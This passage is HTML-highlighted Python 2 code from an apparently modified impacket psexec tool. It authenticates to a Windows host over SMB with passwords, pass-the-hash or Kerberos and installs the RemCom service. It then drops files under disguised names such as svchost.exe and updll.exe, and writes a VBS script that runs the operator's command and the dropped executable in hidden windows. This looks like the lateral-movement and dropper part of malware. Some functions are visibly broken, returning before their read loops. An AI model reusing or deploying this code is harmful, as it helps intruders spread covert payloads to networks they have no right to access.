            <span class="bp">self</span><span class="p">.</span><span class="n">tid</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">connectTree</span><span class="p">(</span><span class="s">'IPC$'</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">waitNamedPipe</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">pipe</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">fid</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">openFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">pipe</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">permissions</span><span class="p">,</span> <span class="n">creationOption</span><span class="o">=</span><span class="mi">64</span><span class="p">,</span> <span class="n">fileAttributes</span><span class="o">=</span><span class="mi">128</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">setTimeout</span><span class="p">(</span><span class="mi">1000</span><span class="p">)</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">error</span><span class="p">(</span><span class="s">"Something wen't wrong connecting the pipes(%s), try again"</span> <span class="o">%</span> <span class="bp">self</span><span class="p">.</span><span class="n">__class__</span><span class="p">)</span>


<span class="k">class</span> <span class="nc">RemoteStdOutPipe</span><span class="p">(</span><span class="n">Pipes</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">):</span>
        <span class="n">Pipes</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">global</span> <span class="n">LastDataSent</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">connectPipe</span><span class="p">()</span>
        <span class="k">return</span>
        <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">ans</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">readFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">fid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1024</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="k">if</span> <span class="n">ans</span> <span class="o">!=</span> <span class="n">LastDataSent</span><span class="p">:</span>
                        <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">ans</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'cp437'</span><span class="p">))</span>
                        <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
                    <span class="k">else</span><span class="p">:</span>
                        <span class="n">LastDataSent</span> <span class="o">=</span> <span class="s">''</span>
                    <span class="k">if</span> <span class="n">LastDataSent</span> <span class="o">&gt;</span> <span class="mi">10</span><span class="p">:</span>
                        <span class="n">LastDataSent</span> <span class="o">=</span> <span class="s">''</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">pass</span>


<span class="k">class</span> <span class="nc">RemoteStdErrPipe</span><span class="p">(</span><span class="n">Pipes</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">):</span>
        <span class="n">Pipes</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">connectPipe</span><span class="p">()</span>
        <span class="k">return</span>
        <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">ans</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">readFile</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">fid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1024</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">sys</span><span class="p">.</span><span class="n">stderr</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">ans</span><span class="p">))</span>
                    <span class="n">sys</span><span class="p">.</span><span class="n">stderr</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">pass</span>


<span class="k">class</span> <span class="nc">RemoteStdInPipe</span><span class="p">(</span><span class="n">Pipes</span><span class="p">):</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">,</span> <span class="n">share</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">shell</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="n">Pipes</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">,</span> <span class="n">share</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">connectPipe</span><span class="p">()</span>
        <span class="k">return</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">shell</span> <span class="o">=</span> <span class="n">RemoteShell</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">port</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">credentials</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">tid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">fid</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">share</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">transport</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">shell</span><span class="p">.</span><span class="n">cmdloop</span><span class="p">()</span>


<span class="k">class</span> <span class="nc">StrReader</span><span class="p">:</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="nb">str</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__str</span> <span class="o">=</span> <span class="nb">str</span>

    <span class="k">def</span> <span class="nf">close</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">pass</span>

    <span class="k">def</span> <span class="nf">read</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="mi">1024</span><span class="p">):</span>
        <span class="n">ret_str</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__str</span><span class="p">[:</span><span class="n">size</span><span class="p">]</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__str</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__str</span><span class="p">[</span><span class="n">size</span><span class="p">:]</span>
        <span class="k">return</span> <span class="n">ret_str</span>


<span class="k">class</span> <span class="nc">PSEXEC</span><span class="p">:</span>
    <span class="n">KNOWN_PROTOCOLS</span> <span class="o">=</span> <span class="p">{</span><span class="s">'445/SMB'</span><span class="p">:</span> <span class="p">(</span><span class="s">'ncacn_np:%s[</span><span class="se">\\</span><span class="s">pipe</span><span class="se">\\</span><span class="s">svcctl]'</span><span class="p">,</span> <span class="mi">445</span><span class="p">)}</span>

    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">copyFile</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">exeFile</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">cmd</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">domain</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">fr</span><span class="o">=</span><span class="s">''</span><span class="p">,</span> <span class="n">hashes</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">aesKey</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">doKerberos</span><span class="o">=</span><span class="bp">False</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__username</span> <span class="o">=</span> <span class="n">username</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__password</span> <span class="o">=</span> <span class="n">password</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__protocols</span> <span class="o">=</span> <span class="n">PSEXEC</span><span class="p">.</span><span class="n">KNOWN_PROTOCOLS</span><span class="p">.</span><span class="n">keys</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__command</span> <span class="o">=</span> <span class="n">cmd</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__domain</span> <span class="o">=</span> <span class="n">domain</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__fr</span> <span class="o">=</span> <span class="n">fr</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__lmhash</span> <span class="o">=</span> <span class="s">''</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__nthash</span> <span class="o">=</span> <span class="s">''</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__path</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__aesKey</span> <span class="o">=</span> <span class="n">aesKey</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__exeFile</span> <span class="o">=</span> <span class="n">exeFile</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__copyFile</span> <span class="o">=</span> <span class="n">copyFile</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">__doKerberos</span> <span class="o">=</span> <span class="n">doKerberos</span>
        <span class="k">if</span> <span class="n">hashes</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">__lmhash</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__nthash</span> <span class="o">=</span> <span class="n">hashes</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">':'</span><span class="p">)</span>
        <span class="k">return</span>

    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">protocol</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">__protocols</span><span class="p">:</span>
            <span class="n">protodef</span> <span class="o">=</span> <span class="n">PSEXEC</span><span class="p">.</span><span class="n">KNOWN_PROTOCOLS</span><span class="p">[</span><span class="n">protocol</span><span class="p">]</span>
            <span class="n">port</span> <span class="o">=</span> <span class="n">protodef</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Trying protocol %s...</span><span class="se">\n</span><span class="s">'</span> <span class="o">%</span> <span class="n">protocol</span><span class="p">)</span>
            <span class="n">stringbinding</span> <span class="o">=</span> <span class="n">protodef</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">%</span> <span class="n">addr</span>
            <span class="n">rpctransport</span> <span class="o">=</span> <span class="n">transport</span><span class="p">.</span><span class="n">DCERPCTransportFactory</span><span class="p">(</span><span class="n">stringbinding</span><span class="p">)</span>
            <span class="n">rpctransport</span><span class="p">.</span><span class="n">set_dport</span><span class="p">(</span><span class="n">port</span><span class="p">)</span>
            <span class="k">if</span> <span class="nb">hasattr</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">,</span> <span class="s">'set_credentials'</span><span class="p">):</span>
                <span class="n">rpctransport</span><span class="p">.</span><span class="n">set_credentials</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__username</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__password</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__domain</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__lmhash</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__nthash</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">__aesKey</span><span class="p">)</span>
            <span class="n">rpctransport</span><span class="p">.</span><span class="n">set_kerberos</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__doKerberos</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">doStuff</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">openPipe</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">accessMask</span><span class="p">):</span>
        <span class="n">pipeReady</span> <span class="o">=</span> <span class="bp">False</span>
        <span class="n">tries</span> <span class="o">=</span> <span class="mi">50</span>
        <span class="k">while</span> <span class="n">pipeReady</span> <span class="ow">is</span> <span class="bp">False</span> <span class="ow">and</span> <span class="n">tries</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">:</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">s</span><span class="p">.</span><span class="n">waitNamedPipe</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">)</span>
                <span class="n">pipeReady</span> <span class="o">=</span> <span class="bp">True</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="n">tries</span> <span class="o">-=</span> <span class="mi">1</span>
                <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span>

        <span class="k">if</span> <span class="n">tries</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
            <span class="n">logging</span><span class="p">.</span><span class="n">critical</span><span class="p">(</span><span class="s">'Pipe not ready, aborting'</span><span class="p">)</span>
            <span class="k">raise</span>
        <span class="n">fid</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">openFile</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">accessMask</span><span class="p">,</span> <span class="n">creationOption</span><span class="o">=</span><span class="mi">64</span><span class="p">,</span> <span class="n">fileAttributes</span><span class="o">=</span><span class="mi">128</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">fid</span>

    <span class="k">def</span> <span class="nf">connectPipe</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permisssions</span><span class="p">):</span>
        <span class="n">transport</span> <span class="o">=</span> <span class="n">rpctransport</span>
        <span class="n">server</span> <span class="o">=</span> <span class="n">SMBConnection</span><span class="p">(</span><span class="s">'*SMBSERVER'</span><span class="p">,</span> <span class="n">transport</span><span class="p">.</span><span class="n">get_smb_connection</span><span class="p">().</span><span class="n">getRemoteHost</span><span class="p">(),</span> <span class="n">sess_port</span><span class="o">=</span><span class="n">transport</span><span class="p">.</span><span class="n">get_dport</span><span class="p">(),</span> <span class="n">preferredDialect</span><span class="o">=</span><span class="n">dialect</span><span class="p">)</span>
        <span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span> <span class="o">=</span> <span class="n">transport</span><span class="p">.</span><span class="n">get_credentials</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">transport</span><span class="p">.</span><span class="n">get_kerberos</span><span class="p">()</span> <span class="ow">is</span> <span class="bp">True</span><span class="p">:</span>
            <span class="n">server</span><span class="p">.</span><span class="n">kerberosLogin</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">,</span> <span class="n">aesKey</span><span class="p">,</span> <span class="n">TGT</span><span class="o">=</span><span class="n">TGT</span><span class="p">,</span> <span class="n">TGS</span><span class="o">=</span><span class="n">TGS</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">server</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">,</span> <span class="n">domain</span><span class="p">,</span> <span class="n">lm</span><span class="p">,</span> <span class="n">nt</span><span class="p">)</span>
        <span class="n">tid</span> <span class="o">=</span> <span class="n">server</span><span class="p">.</span><span class="n">connectTree</span><span class="p">(</span><span class="s">'IPC$'</span><span class="p">)</span>
        <span class="n">server</span><span class="p">.</span><span class="n">waitNamedPipe</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">)</span>
        <span class="n">fid</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">server</span><span class="p">.</span><span class="n">openFile</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">pipe</span><span class="p">,</span> <span class="n">permissions</span><span class="p">,</span> <span class="n">creationOption</span><span class="o">=</span><span class="mi">64</span><span class="p">,</span> <span class="n">fileAttributes</span><span class="o">=</span><span class="mi">128</span><span class="p">)</span>
        <span class="n">server</span><span class="p">.</span><span class="n">setTimeout</span><span class="p">(</span><span class="mi">6000</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">server</span>

    <span class="k">def</span> <span class="nf">doStuff</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">rpctransport</span><span class="p">):</span>
        <span class="k">global</span> <span class="n">LastDataSent</span>
        <span class="k">global</span> <span class="n">dialect</span>
        <span class="n">dce</span> <span class="o">=</span> <span class="n">rpctransport</span><span class="p">.</span><span class="n">get_dce_rpc</span><span class="p">()</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">dce</span><span class="p">.</span><span class="n">connect</span><span class="p">()</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">return</span> <span class="bp">False</span>

        <span class="n">dialect</span> <span class="o">=</span> <span class="n">rpctransport</span><span class="p">.</span><span class="n">get_smb_connection</span><span class="p">().</span><span class="n">getDialect</span><span class="p">()</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">unInstalled</span> <span class="o">=</span> <span class="bp">False</span>
            <span class="n">s</span> <span class="o">=</span> <span class="n">rpctransport</span><span class="p">.</span><span class="n">get_smb_connection</span><span class="p">()</span>
            <span class="n">s</span><span class="p">.</span><span class="n">setTimeout</span><span class="p">(</span><span class="mi">30000</span><span class="p">)</span>
            <span class="n">installService</span> <span class="o">=</span> <span class="n">serviceinstall</span><span class="p">.</span><span class="n">ServiceInstall</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">.</span><span class="n">get_smb_connection</span><span class="p">(),</span> <span class="n">remcomsvc</span><span class="p">.</span><span class="n">RemComSvc</span><span class="p">())</span>
            <span class="n">installService</span><span class="p">.</span><span class="n">install</span><span class="p">()</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">__copyFile</span><span class="p">:</span>
                <span class="k">try</span><span class="p">:</span>
                    <span class="n">installService</span><span class="p">.</span><span class="n">copy_file</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__copyFile</span><span class="p">,</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">svchost.exe'</span><span class="p">)</span>
                <span class="k">except</span><span class="p">:</span>
                    <span class="k">print</span> <span class="s">'file exist'</span>

            <span class="n">tid</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">connectTree</span><span class="p">(</span><span class="s">'IPC$'</span><span class="p">)</span>
            <span class="n">fid_main</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">openPipe</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">tid</span><span class="p">,</span> <span class="s">'</span><span class="se">\\</span><span class="s">RemCom_communicaton'</span><span class="p">,</span> <span class="mi">1180063</span><span class="p">)</span>
            <span class="n">packet</span> <span class="o">=</span> <span class="n">RemComMessage</span><span class="p">()</span>
            <span class="n">pid</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">getpid</span><span class="p">()</span>
            <span class="n">packet</span><span class="p">[</span><span class="s">'Machine'</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="s">''</span><span class="p">).</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">letters</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)])</span>
            <span class="n">packet</span><span class="p">[</span><span class="s">'ProcessID'</span><span class="p">]</span> <span class="o">=</span> <span class="n">pid</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">__exeFile</span><span class="p">:</span>
                <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">__fr</span> <span class="o">==</span> <span class="s">'1'</span><span class="p">:</span>
                    <span class="n">installService</span><span class="p">.</span><span class="n">copy_file</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__exeFile</span><span class="p">,</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">updll.exe'</span><span class="p">)</span>
                    <span class="bp">self</span><span class="p">.</span><span class="n">__command</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">'"'</span><span class="p">,</span> <span class="s">'""'</span><span class="p">)</span>
                    <span class="n">vbs_cmd</span> <span class="o">=</span> <span class="s">'</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "%s",0</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "..</span><span class="se">\\\\</span><span class="s">temp</span><span class="se">\\\\</span><span class="s">updll.exe",0                  </span><span class="se">\n</span><span class="s">                    '</span> <span class="o">%</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span>
                <span class="k">elif</span> <span class="bp">self</span><span class="p">.</span><span class="n">__fr</span> <span class="o">==</span> <span class="s">'3'</span><span class="p">:</span>
                    <span class="n">installService</span><span class="p">.</span><span class="n">copy_file</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__exeFile</span><span class="p">,</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">setup-install.exe'</span><span class="p">)</span>
                    <span class="bp">self</span><span class="p">.</span><span class="n">__command</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">'"'</span><span class="p">,</span> <span class="s">'""'</span><span class="p">)</span>
                    <span class="n">vbs_cmd</span> <span class="o">=</span> <span class="s">'</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "%s",0</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "..</span><span class="se">\\\\</span><span class="s">temp</span><span class="se">\\\\</span><span class="s">setup-install.exe",0                  </span><span class="se">\n</span><span class="s">                    '</span> <span class="o">%</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">installService</span><span class="p">.</span><span class="n">copy_file</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">__exeFile</span><span class="p">,</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">upinstalled.exe'</span><span class="p">)</span>
                    <span class="bp">self</span><span class="p">.</span><span class="n">__command</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">'"'</span><span class="p">,</span> <span class="s">'""'</span><span class="p">)</span>
                    <span class="n">vbs_cmd</span> <span class="o">=</span> <span class="s">'</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "%s",0</span><span class="se">\n</span><span class="s">    Set ws = CreateObject("WScript.Shell")</span><span class="se">\n</span><span class="s">    ws.Run "..</span><span class="se">\\\\</span><span class="s">temp</span><span class="se">\\\\</span><span class="s">upinstalled.exe",0                  </span><span class="se">\n</span><span class="s">                    '</span> <span class="o">%</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span>
                <span class="n">installService</span><span class="p">.</span><span class="n">copy_file</span><span class="p">(</span><span class="n">StrReader</span><span class="p">(</span><span class="n">vbs_cmd</span><span class="p">.</span><span class="n">strip</span><span class="p">()),</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">tmp.vbs'</span><span class="p">)</span>
                <span class="bp">self</span><span class="p">.</span><span class="n">__command</span> <span class="o">=</span> <span class="s">'cmd /c call "c:</span><span class="se">\\</span><span class="s">windows</span><span class="se">\\</span><span class="s">temp</span><span class="se">\\</span><span class="s">tmp.vbs"'</span>
            <span class="n">packet</span><span class="p">[</span><span class="s">'Command'</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span>
            <span class="k">print</span> <span class="bp">self</span><span class="p">.</span><span class="n">__command</span>
            <span class="n">s</span><span class="p">.</span><span class="n">writeNamedPipe</span><span class="p">(</span><span class="n">tid</span><span class="p">,</span> <span class="n">fid_main</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">packet</span><span class="p">))</span>
            <span class="n">LastDataSent</span> <span class="o">=</span> <span class="s">''</span>
            <span class="n">stdin_pipe</span> <span class="o">=</span> <span class="n">RemoteStdInPipe</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">,</span> <span class="s">'</span><span class="se">\\</span><span class="s">%s%s%d'</span> <span class="o">%</span> <span class="p">(</span><span class="n">RemComSTDIN</span><span class="p">,</span> <span class="n">packet</span><span class="p">[</span><span class="s">'Machine'</span><span class="p">],</span> <span class="n">packet</span><span class="p">[</span><span class="s">'ProcessID'</span><span class="p">]),</span> <span class="n">smb</span><span class="p">.</span><span class="n">FILE_WRITE_DATA</span> <span class="o">|</span> <span class="n">smb</span><span class="p">.</span><span class="n">FILE_APPEND_DATA</span><span class="p">,</span> <span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">())</span>
            <span class="n">stdin_pipe</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>
            <span class="n">stdout_pipe</span> <span class="o">=</span> <span class="n">RemoteStdOutPipe</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">,</span> <span class="s">'</span><span class="se">\\</span><span class="s">%s%s%d'</span> <span class="o">%</span> <span class="p">(</span><span class="n">RemComSTDOUT</span><span class="p">,</span> <span class="n">packet</span><span class="p">[</span><span class="s">'Machine'</span><span class="p">],</span> <span class="n">packet</span><span class="p">[</span><span class="s">'ProcessID'</span><span class="p">]),</span> <span class="n">smb</span><span class="p">.</span><span class="n">FILE_READ_DATA</span><span class="p">)</span>
            <span class="n">stdout_pipe</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>
